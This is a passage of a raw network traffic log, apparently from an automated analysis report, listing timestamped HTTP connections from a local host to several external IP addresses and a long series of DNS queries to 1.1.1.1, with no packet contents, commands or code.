                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.005781889 CET8060010172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.911803007 CET8060010172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.911894083 CET6001080192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.911957026 CET6001080192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.911974907 CET8060010172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.912029028 CET6001080192.168.2.5172.234.222.143
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.917431116 CET8060010172.234.222.143192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.953800917 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.959202051 CET806001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.959275961 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.959419012 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.959434032 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.964767933 CET806001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:55.964819908 CET806001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.789963007 CET806001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.789998055 CET806001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.790080070 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.790224075 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.804784060 CET806001118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.804858923 CET6001180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.830080986 CET6001280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.835583925 CET806001282.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.835674047 CET6001280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.835853100 CET6001280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.835887909 CET6001280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.842160940 CET806001282.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:57.842190027 CET806001282.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:53:06.343703032 CET806001282.112.184.197192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:53:06.343871117 CET6001280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:53:06.343954086 CET6001280192.168.2.582.112.184.197
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:53:06.349351883 CET806001282.112.184.197192.168.2.5

                                                                                                                                                                                                                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:58.852785110 CET5955353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:58.860671997 CET53595531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:59.705899954 CET5175253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:49:59.871634007 CET53517521.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.006891012 CET6343553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.014678955 CET53634351.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.904794931 CET5960453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:00.915004969 CET53596041.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.449763060 CET5245853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:01.637240887 CET53524581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.676984072 CET5383953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.686670065 CET53538391.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.697407007 CET5094553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:02.707448959 CET53509451.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.595184088 CET5484653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:03.603594065 CET53548461.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.596829891 CET6206753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:04.604485035 CET53620671.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.147089005 CET6249353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.156002045 CET53624931.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.156759977 CET6409853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:06.166157961 CET53640981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.680524111 CET5755153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.689302921 CET53575511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.690089941 CET5182853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.706392050 CET53518281.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.707196951 CET6166553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:07.715833902 CET53616651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.868803024 CET6457253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:24.877491951 CET53645721.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:41.970679998 CET5482953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:41.978333950 CET53548291.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:43.751815081 CET5607153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:43.944245100 CET53560711.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.692521095 CET6551453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:45.700907946 CET53655141.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.600362062 CET5766453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:46.610321045 CET53576641.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.354352951 CET5475153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:48.362464905 CET53547511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:49.995340109 CET4917753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:50.003856897 CET53491771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.219710112 CET6501453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:51.228598118 CET53650141.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.189018011 CET6339353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:52.197299957 CET53633931.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.309561014 CET5140153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:53.317384005 CET53514011.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.282622099 CET6073553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:55.290446997 CET53607351.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.291156054 CET5853153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:56.299453020 CET53585311.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.448195934 CET5091453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:57.459569931 CET53509141.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.583786964 CET6126753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:58.592896938 CET53612671.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.360500097 CET5668353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:50:59.370845079 CET53566831.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.736924887 CET5589853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:00.744595051 CET53558981.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.847632885 CET5507553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:01.861124992 CET53550751.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.706526041 CET6264253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:02.853996992 CET53626421.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.133127928 CET5755353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:04.141012907 CET53575531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.247001886 CET6290553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:05.255964994 CET53629051.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.026309967 CET6166553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:07.037302017 CET53616651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.184406042 CET6317353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:08.192347050 CET53631731.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.505151987 CET5866953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:09.514775991 CET53586691.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.115056038 CET5440253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.123327017 CET53544021.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.124059916 CET4916053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:11.133649111 CET53491601.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.376104116 CET6095753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:12.384679079 CET53609571.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.751931906 CET6168053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:13.760292053 CET53616801.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.451435089 CET4933153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:15.459930897 CET53493311.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:16.915152073 CET6487753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:17.120539904 CET53648771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.038057089 CET5544753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:19.046371937 CET53554471.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.667340040 CET5174753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:20.676110983 CET53517471.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.145462990 CET6294553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:22.339181900 CET53629451.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.200151920 CET5536053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:23.208785057 CET53553601.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.171866894 CET5972653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:24.180802107 CET53597261.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.040499926 CET6128553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:25.051558018 CET53612851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.042457104 CET5735853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.050436020 CET53573581.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.964453936 CET5237453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:26.973980904 CET53523741.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.446038008 CET6494153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:28.454154015 CET53649411.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.635479927 CET5245453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:29.644123077 CET53524541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.091511965 CET6110553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.099509001 CET53611051.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.825014114 CET6522753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.834434032 CET53652271.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.848088980 CET5047453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:31.858166933 CET53504741.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.316127062 CET6290053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:33.324261904 CET53629001.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.339103937 CET5805053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:34.346837044 CET53580501.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.823595047 CET6063253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:35.832168102 CET53606321.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:37.317483902 CET5625453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:37.326235056 CET53562541.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.033188105 CET5857053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.041331053 CET53585701.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.885278940 CET5440753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:38.894041061 CET53544071.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:39.576380014 CET5613953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:39.600198030 CET5613953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:39.775540113 CET53561391.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:39.775577068 CET53561391.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:40.631932020 CET4936553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:40.640727997 CET53493651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:41.621439934 CET5382653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:41.629086971 CET53538261.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:43.060237885 CET6033153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:43.068480015 CET53603311.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.064688921 CET6474253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:44.073437929 CET53647421.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.518876076 CET6354753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:45.527640104 CET53635471.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.240827084 CET5878853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:46.251173973 CET53587881.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.095659018 CET5911853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.115859032 CET5911853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.195848942 CET53591181.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:47.195888996 CET53591181.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.630945921 CET5632153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.639446974 CET53563211.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.940952063 CET5268153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:48.948714972 CET53526811.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.635838032 CET6488253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.662869930 CET6488253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.830969095 CET53648821.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:49.831022024 CET53648821.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:50.904371977 CET6435053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:50.912482023 CET53643501.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:51.629144907 CET5552253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:51.638003111 CET53555221.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:52.613784075 CET5755353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:52.621853113 CET53575531.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:53.481059074 CET5331553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:53.489981890 CET53533151.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:54.334994078 CET5312153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:54.342746019 CET53531211.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.195916891 CET6004253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.225258112 CET6004253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.642637014 CET53600421.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:55.643920898 CET53600421.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.323522091 CET5302153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:56.331598997 CET53530211.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.040815115 CET5873753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.049442053 CET53587371.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.049976110 CET5838553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:57.058105946 CET53583851.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.726229906 CET5053753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:58.736538887 CET53505371.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.426347971 CET5094153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:51:59.434878111 CET53509411.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.890336990 CET6055153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:00.898654938 CET53605511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.565340042 CET5303453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:01.573326111 CET53530341.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.048366070 CET6007753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:03.057043076 CET53600771.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.178684950 CET5230853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.187935114 CET53523081.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.878850937 CET5011053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:04.888478041 CET53501101.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.732358932 CET6343253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:05.741265059 CET53634321.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.681616068 CET6156753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.709644079 CET6156753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.875269890 CET53615671.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:06.875370026 CET53615671.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.869496107 CET5513153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:07.879863024 CET53551311.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.791812897 CET5172753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:08.800915003 CET53517271.1.1.1192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.249466896 CET6235153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                                                                                                                                                                                  Oct 28, 2024 16:52:10.272289991 CET6235153192.168.2.51.1.1.1
